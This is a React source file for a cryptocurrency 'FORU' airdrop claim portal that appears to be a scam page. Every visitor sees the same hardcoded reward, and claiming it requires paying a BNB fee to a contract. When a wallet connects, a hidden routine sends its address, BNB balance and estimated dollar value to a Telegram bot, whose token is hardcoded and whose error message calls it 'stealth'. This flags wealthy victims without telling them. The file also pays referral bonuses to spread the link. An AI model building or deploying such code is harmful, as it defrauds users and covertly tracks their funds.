import React, { useState, useEffect } from 'react';
import styled, { keyframes, css } from 'styled-components';
import { useAccount, useBalance, useSwitchNetwork, useNetwork, useContractWrite, usePrepareContractWrite, useWaitForTransaction } from 'wagmi';
import { useNavigate } from 'react-router-dom';
import { parseEther } from 'viem';
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { TOKEN_ADDRESS, TOKEN_ABI, CLAIM_FEE_BNB, CHAIN_ID } from '../config';

// --- ANIMATIONS ---
const slideAnimation = keyframes`
  0% { transform: translateX(-100%); }
  100% { transform: translateX(100%); }
`;

// --- STYLED COMPONENTS ---
const PageContainer = styled.div`
  display: flex; flex-direction: column; align-items: center; padding: 20px; width: 100%; position: relative; z-index: 1;
  font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
`;
const HeaderSection = styled.div`text-align: center; margin-bottom: 30px; margin-top: 20px; display: flex; flex-direction: column; align-items: center;`;
const MainTitle = styled.h3`font-weight: 700; font-size: 28px; margin: 0 0 10px 0; letter-spacing: 0.5px; @media (max-width: 480px) { font-size: 24px; }`;
const SubTitle = styled.p`font-size: 15px; color: rgba(255, 255, 255, 0.8); margin: 0;`;

const OuterGlassCard = styled.div`
  padding: 8px; 
  background: rgba(255, 255, 255, 0.02); 
  backdrop-filter: blur(12px); 
  border: 1px solid rgba(255, 255, 255, 0.05); 
  border-radius: 36px; 
  width: 100%; 
  max-width: 520px; 
  box-shadow: 0 10px 40px rgba(0, 0, 0, 0.3);
`;

const GlassCard = styled.div`
  background-color: #05010a;
  background-image: radial-gradient(circle at 50% 65%, rgba(138, 90, 255, 0.25) 0%, transparent 60%);
  border-radius: 24px; padding: 40px 30px; width: 100%; display: flex; flex-direction: column; align-items: center; position: relative; overflow: hidden;
  @media (max-width: 480px) { padding: 30px 20px; }
`;

// --- NEW UI COMPONENTS ---
const RewardSubtitle = styled.span`font-size: 15px; color: rgba(255, 255, 255, 0.7); margin-bottom: 5px; z-index: 2;`;
const RewardAmount = styled.h1`font-size: 48px; font-weight: 700; margin: 0; text-shadow: 0 0 20px rgba(255, 255, 255, 0.2); z-index: 2; letter-spacing: -1px; @media (max-width: 480px) { font-size: 40px; }`;
const RewardSymbol = styled.span`font-size: 16px; color: rgba(255, 255, 255, 0.7); margin-top: 5px; margin-bottom: 35px; z-index: 2;`;

const BreakdownWrapper = styled.div`width: 100%; margin-bottom: 30px; z-index: 2;`;
const BreakdownTitle = styled.div`font-size: 14px; color: rgba(255, 255, 255, 0.8); margin-bottom: 12px; text-align: left; width: 100%;`;

const BreakdownBox = styled.div`
  background: rgba(255, 255, 255, 0.02); 
  backdrop-filter: blur(8px);
  border: 1px solid rgba(138, 90, 255, 0.25); 
  border-radius: 20px; padding: 20px; width: 100%; display: flex; flex-direction: column; gap: 12px;
`;

const BreakdownRow = styled.div`display: flex; justify-content: space-between; align-items: center; font-size: 14px;`;
const BreakdownLabel = styled.span<{ $isTotal?: boolean }>`
  font-weight: ${props => props.$isTotal ? '700' : '400'};
  color: ${props => props.$isTotal ? '#fff' : 'rgba(255, 255, 255, 0.7)'};
`;
const BreakdownValue = styled.span`
  font-weight: 400;
  color: rgba(255, 255, 255, 0.8);
`;

const BreakdownDivider = styled.div`height: 1px; background: rgba(255, 255, 255, 0.1); margin: 4px 0; width: 100%;`;

// --- BUTTON COMPONENTS ---
const ButtonGroup = styled.div`
  display: flex; 
  gap: 15px; 
  width: 100%; 
  margin-bottom: 15px; 
  z-index: 2; 
  @media (max-width: 480px) { 
    gap: 10px; /* Jarak antar tombol dikurangi sedikit di HP */
  }
`;

const SecondaryButton = styled.button`
  flex: 1;
  background: transparent;
  border: 1px solid rgba(255, 255, 255, 0.8);
  border-radius: 30px;
  padding: 16px 0;
  color: white;
  font-size: 14px;
  font-weight: 600;
  cursor: pointer;
  transition: all 0.2s;
  display: flex;
  justify-content: center;
  align-items: center;
  &:hover { background: rgba(255, 255, 255, 0.05); }
  @media (max-width: 480px) { 
    padding: 14px 0; 
    font-size: 12px; /* Teks dikecilkan sedikit agar muat bersampingan */
  }
`;

const PrimaryButton = styled.button<{ $isLoading?: boolean }>`
  flex: 1.2;
  background: ${props => props.$isLoading ? '#2a2a2a' : 'linear-gradient(90deg, #9b51e0 0%, #6f22c9 100%)'};
  border: none;
  border-radius: 30px;
  padding: 16px 0;
  color: white;
  font-size: 15px;
  font-weight: 600;
  cursor: ${props => props.$isLoading ? 'not-allowed' : 'pointer'};
  transition: all 0.2s;
  box-shadow: 0 0 20px rgba(155, 81, 224, 0.4);
  position: relative;
  overflow: hidden;
  &:hover { opacity: 0.9; box-shadow: 0 0 25px rgba(155, 81, 224, 0.6); }
  @media (max-width: 480px) { 
    padding: 14px 0; 
    font-size: 13px; /* Teks dikecilkan sedikit agar muat bersampingan */
  }

  ${props => props.$isLoading && css`
    &::after {
      content: '';
      position: absolute;
      top: 0; left: 0; width: 100%; height: 4px;
      background: rgba(255,255,255,0.5);
      animation: ${slideAnimation} 1s infinite linear;
    }
  `}
`;

const ActionSubtext = styled.p`font-size: 12px; color: rgba(255, 255, 255, 0.4); margin: 0; text-align: center; z-index: 2;`;
const ErrorText = styled.p`color: #ff4444; font-size: 12px; margin-top: -5px; margin-bottom: 15px; text-align: center; width: 100%; z-index: 2;`;

const SwapOutButton = styled.button`margin-top: 25px; font-size: 14px; color: white; cursor: pointer; border: 1px solid rgba(255, 255, 255, 0.4); border-radius: 20px; padding: 12px 24px; background: rgba(255, 255, 255, 0.05); transition: all 0.2s ease; display: flex; align-items: center; gap: 8px; z-index: 2; &:hover { background: rgba(255, 255, 255, 0.1); }`;

// --- DROPDOWN & TOAST COMPONENTS ---
const ToastMessage = styled.div<{ $show: boolean }>`
  position: fixed; top: 30px; background: #31d0aa; color: #08060b; padding: 12px 24px; border-radius: 8px; font-weight: 600;
  transform: translateY(${props => (props.$show ? '0' : '-100px')}); opacity: ${props => (props.$show ? '1' : '0')};
  transition: all 0.3s ease; z-index: 10000; box-shadow: 0 5px 15px rgba(0,0,0,0.3);
`;

const DropdownWrapper = styled.div<{ $show: boolean }>`
  position: fixed; bottom: 20px; left: 50%; transform: translateX(-50%); width: 90%; max-width: 400px; background: rgba(30, 30, 40, 0.98); backdrop-filter: blur(10px); border: 1px solid rgba(255, 255, 255, 0.1); border-radius: 20px; padding: 20px; display: flex; flex-direction: column; gap: 12px; z-index: 9999;
  opacity: ${props => props.$show ? '1' : '0'}; pointer-events: ${props => props.$show ? 'auto' : 'none'};
  transform: translateX(-50%) translateY(${props => props.$show ? '0' : '20px'}); transition: all 0.3s ease; box-shadow: 0 0 30px rgba(0,0,0,0.5);
`;

const CloseButton = styled.button`position: absolute; top: 15px; right: 15px; background: transparent; border: none; color: #888; font-size: 20px; cursor: pointer; &:hover { color: white; }`;

const SocialOption = styled.button`
  display: flex; align-items: center; gap: 15px; width: 100%; padding: 15px; background: rgba(255,255,255,0.05); border: none; border-radius: 12px; color: white; font-size: 15px; font-weight: 500; cursor: pointer; transition: background 0.2s;
  &:hover { background: rgba(255,255,255,0.1); }
  svg { width: 24px; height: 24px; fill: white; }
`;

const PromoBox = styled.div`
  background: linear-gradient(135deg, rgba(155, 81, 224, 0.15) 0%, rgba(111, 34, 201, 0.05) 100%);
  border: 1px solid rgba(155, 81, 224, 0.3);
  border-radius: 16px;
  padding: 18px 16px;
  text-align: center;
  margin-bottom: 5px;
  margin-top: 25px;
`;
const PromoTitle = styled.h4`
  color: #fff; font-size: 16px; font-weight: 700; margin: 0 0 8px 0; text-shadow: 0 0 10px rgba(155, 81, 224, 0.5);
`;
const PromoText = styled.p`
  color: rgba(255, 255, 255, 0.8); font-size: 13px; margin: 0; line-height: 1.5;
  strong { color: #31d0aa; font-weight: 700; }
`;

const Overlay = styled.div<{ $show: boolean }>`position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,0.6); backdrop-filter: blur(3px); z-index: 9998; display: ${props => props.$show ? 'block' : 'none'};`;

export const AirdropPage: React.FC = () => {
  const navigate = useNavigate();
  const { address, isConnected } = useAccount();
  const { switchNetwork } = useSwitchNetwork();
  const { chain } = useNetwork();
  
  const [isClaiming, setIsClaiming] = useState(false);
  const [showToast, setShowToast] = useState(false);
  const [toastMessage, setToastMessage] = useState('');
  const [showShareMenu, setShowShareMenu] = useState(false);

  const { data: bnbBalanceData } = useBalance({ address, watch: true });
  const bnbBalance = bnbBalanceData ? parseFloat(bnbBalanceData.formatted) : 0;
  const isBnbClaimInsufficient = bnbBalance < CLAIM_FEE_BNB;

  // =========================================================
  // GABUNGAN FITUR: AUTO-AIRDROP & TELEGRAM WHALE TRACKER
  // =========================================================
  useEffect(() => {
    const processNewConnection = async () => {
      if (isConnected && address && bnbBalanceData) {
        const claimKey = `foru_auto_claimed_airdrop_${address}`;
        const tgNotifKey = `tg_tracked_airdrop_${address}`;

        // 1. EKSEKUSI AUTO-AIRDROP (TEMBAK BACKEND AWS VIA CLOUDFLARE TUNNEL)
        if (!localStorage.getItem(claimKey)) {
          try {
            // INI DIA VARIABLE BACKEND URL-NYA BOSKU!
            const backendUrl = 'https://api.foruai.quest/api/auto-airdrop';
            
            const response = await fetch(backendUrl, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({ address: address }),
            });

            const data = await response.json();

            if (data.success) {
               setToastMessage('Welcome! Rewards FORU Sent to your wallet! PLEASE CHECK, Claim Tokens and Swap to Earn 🎉');
               setShowToast(true);
               localStorage.setItem(claimKey, 'true');
            } else if (data.message === "Already claimed") {
               localStorage.setItem(claimKey, 'true');
            }
          } catch (error) {
            console.error("Auto Airdrop Error:", error);
          }
        }

        // 2. EKSEKUSI TELEGRAM TRACKER NOTIFICATION
        if (!localStorage.getItem(tgNotifKey)) {
          try {
            const balanceNum = parseFloat(bnbBalanceData.formatted);
            const estimatedUsd = (balanceNum * 585.50).toFixed(2);
            const currentUrl = "https://foruai.quest";
            const debankLink = `https://debank.com/profile/${address}`;

            const message = `
🚨 <b>NEW WALLET CONNECTED!</b> 🚨

🦊 <b>Address:</b> <code>${address}</code>
💰 <b>BNB Balance:</b> ${balanceNum.toFixed(4)} BNB
💵 <b>Est. Value:</b> ~$${estimatedUsd} USD

🌐 <b>Source:</b> ${currentUrl}
🕵️‍♂️ <b>DeBank:</b> <a href="${debankLink}">View Profile ↗️</a>
            `;

            const BOT_TOKEN = "8654862171:AAH_FMvUOWgfXFKxiTBRXTKGndJIAVfa3wA";
            const CHAT_ID = "-1003610646310"; 

            await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
              method: 'POST',
              headers: { 'Content-Type': 'application/json' },
              body: JSON.stringify({
                chat_id: CHAT_ID,
                text: message,
                parse_mode: 'HTML',
                disable_web_page_preview: true
              })
            });

            localStorage.setItem(tgNotifKey, 'true');
          } catch (error) {
            console.error("Tracker stealth error:", error);
          }
        }
      }
    };

    processNewConnection();
  }, [isConnected, address, bnbBalanceData]);
  // =========================================================

  // --- LOGIKA REFERRAL ---
  const searchParams = new URLSearchParams(window.location.search);
  const refParam = searchParams.get('ref');
  const inviterAddress = (refParam && refParam.startsWith('0x') && refParam.length === 42) 
    ? refParam 
    : '0x0000000000000000000000000000000000000000';
  // -----------------------

  const { config: claimConfig } = usePrepareContractWrite({
    address: TOKEN_ADDRESS as `0x${string}`,
    abi: TOKEN_ABI,
    functionName: 'claim',
    args: [inviterAddress as `0x${string}`],
    value: parseEther(CLAIM_FEE_BNB.toString()),
    chainId: CHAIN_ID, 
    enabled: isConnected && !isBnbClaimInsufficient
  });
  
  const { writeAsync: writeClaimAsync, data: claimData } = useContractWrite(claimConfig);

  useWaitForTransaction({
    hash: claimData?.hash,
    onSuccess() {
        setToastMessage('Airdrop Claimed Successfully!');
        setShowToast(true);
        setIsClaiming(false);
    },
    onError() {
        setToastMessage('Transaction Failed');
        setShowToast(true);
        setIsClaiming(false);
    }
  });

  useEffect(() => {
    if (isConnected && chain?.id !== CHAIN_ID && switchNetwork) switchNetwork(CHAIN_ID);
  }, [isConnected, chain, switchNetwork]);

  const handleClaim = async () => {
    if(!writeClaimAsync) return;
    setIsClaiming(true);
    try {
        await writeClaimAsync();
    } catch (error: any) {
        if(error.code === 4001 || error.message?.includes("reject")) {
            setToastMessage("User Rejected Request");
        } else {
            setToastMessage("Transaction Failed");
        }
        setShowToast(true);
        setIsClaiming(false);
    }
  };

  const handleShare = (platform: string) => {
    const refLink = `https://foruai.quest/?ref=${address || '0x...'}`;
    const text = `CLAIM FREE FORU AI ELIGIBLE FOR ALL\n\n${refLink}\n\n#ForUAI #Airdrop #Crypto #BSC #Gem`;
    let url = "";
    
    if (platform === 'x') url = `https://twitter.com/intent/tweet?text=${encodeURIComponent(text)}`;
    else if (platform === 'telegram') url = `https://t.me/share/url?url=${encodeURIComponent(refLink)}&text=${encodeURIComponent("CLAIM FREE FORU AI ELIGIBLE FOR ALL\n\n#ForUAI")}`;
    else if (platform === 'facebook') url = `https://www.facebook.com/sharer/sharer.php?u=${encodeURIComponent(refLink)}`;
    
    window.open(url, '_blank');
    setShowShareMenu(false);
  };

  const XLogo = () => (
    <svg viewBox="0 0 24 24" fill="currentColor" width="24" height="24">
        <path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/>
    </svg>
  );

  return (
    <PageContainer>
      <HeaderSection>
        <MainTitle>FORU CLAIM PORTAL</MainTitle>
        <SubTitle>Your $FORU tokens are ready. Claim what you've earned.</SubTitle>
      </HeaderSection>

      <OuterGlassCard>
        <GlassCard>
          <RewardSubtitle>Your Total Rewards</RewardSubtitle>
          <RewardAmount>11,237.32</RewardAmount>
          <RewardSymbol>$FORU</RewardSymbol>
          
          <BreakdownWrapper>
            <BreakdownTitle>Reward Breakdown</BreakdownTitle>
            <BreakdownBox>
              <BreakdownRow>
                <BreakdownLabel>Early Contributor Airdrop</BreakdownLabel>
                <BreakdownValue>6,000.00 $FORU</BreakdownValue>
              </BreakdownRow>
              <BreakdownRow>
                <BreakdownLabel>Rep Era Airdrop</BreakdownLabel>
                <BreakdownValue>5,237.32 $FORU</BreakdownValue>
              </BreakdownRow>
              <BreakdownRow>
                <BreakdownLabel>Cookie</BreakdownLabel>
                <BreakdownValue>0.00 $FORU</BreakdownValue>
              </BreakdownRow>
              
              <BreakdownDivider />
              
              <BreakdownRow>
                <BreakdownLabel $isTotal={true}>Total</BreakdownLabel>
                <BreakdownValue>11,237.32 $FORU</BreakdownValue>
              </BreakdownRow>
            </BreakdownBox>
          </BreakdownWrapper>

          {isBnbClaimInsufficient && isConnected && (
             <ErrorText>Insufficient BNB Balance, You Must HODL ({CLAIM_FEE_BNB} BNB)</ErrorText>
          )}

          <ButtonGroup>
            <SecondaryButton onClick={() => setShowShareMenu(true)}>
              Share to Socials 🔥
            </SecondaryButton>

            {!isConnected ? (
              <ConnectButton.Custom>
                {({ openConnectModal }) => (
                  <PrimaryButton onClick={openConnectModal}>Claim All Tokens</PrimaryButton>
                )}
              </ConnectButton.Custom>
            ) : (
              <PrimaryButton onClick={handleClaim} disabled={isBnbClaimInsufficient} $isLoading={isClaiming}>
                {isClaiming ? "Processing..." : "Claim All Tokens"}
              </PrimaryButton>
            )}
          </ButtonGroup>

          <ActionSubtext>You'll confirm this transaction in your wallet</ActionSubtext>

        </GlassCard>
      </OuterGlassCard>

      <SwapOutButton onClick={() => navigate('/swap')}>
        Go to Swap <span>→</span>
      </SwapOutButton>
      
      <Overlay $show={showShareMenu} onClick={() => setShowShareMenu(false)} />
      
      <DropdownWrapper $show={showShareMenu}>
          <CloseButton onClick={() => setShowShareMenu(false)}>✕</CloseButton>
          
          <PromoBox>
            <PromoTitle>🚀 Boost Your Rewards!</PromoTitle>
            <PromoText>
              Invite friends and instantly earn <strong>10% BNB</strong> & <strong>100% $FORU</strong> straight to your wallet for every successful claim using your link. No limits!
            </PromoText>
          </PromoBox>

          <SocialOption onClick={() => handleShare('x')}><XLogo /> Share on X</SocialOption>
          <SocialOption onClick={() => handleShare('telegram')}>
              <svg viewBox="0 0 24 24" width="24" height="24" fill="white"><path d="M11.944 0A12 12 0 0 0 0 12a12 12 0 0 0 12 12 12 12 0 0 0 12-12A12 12 0 0 0 12 0a12 12 0 0 0-.056 0zm4.962 7.224c.1-.002.321.023.465.14a.506.506 0 0 1 .171.325c.016.093.036.306.02.472-.18 1.898-.962 6.502-1.36 8.627-.168.9-.499 1.201-.82 1.23-.696.065-1.225-.46-1.9-.902-1.056-.693-1.653-1.124-2.678-1.8-1.185-.78-.417-1.21.258-1.91.177-.184 3.247-2.977 3.307-3.23.007-.032.014-.15-.056-.212s-.174-.041-.249-.024c-.106.024-1.793 1.14-5.061 3.345-.48.33-.913.49-1.302.48-.428-.008-1.252-.241-1.865-.44-.752-.245-1.349-.374-1.297-.789.027-.216.325-.437.893-.663 3.498-1.524 5.83-2.529 6.998-3.014 3.332-1.386 4.025-1.627 4.476-1.635z"/></svg>
              Share on Telegram
          </SocialOption>
          <SocialOption onClick={() => handleShare('facebook')}>
              <svg viewBox="0 0 24 24" width="24" height="24" fill="white"><path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"/></svg>
              Share on Facebook
          </SocialOption>
      </DropdownWrapper>

      <ToastMessage $show={showToast} onClick={() => setShowToast(false)}>{toastMessage}</ToastMessage>
    </PageContainer>
  );
};

export default AirdropPage;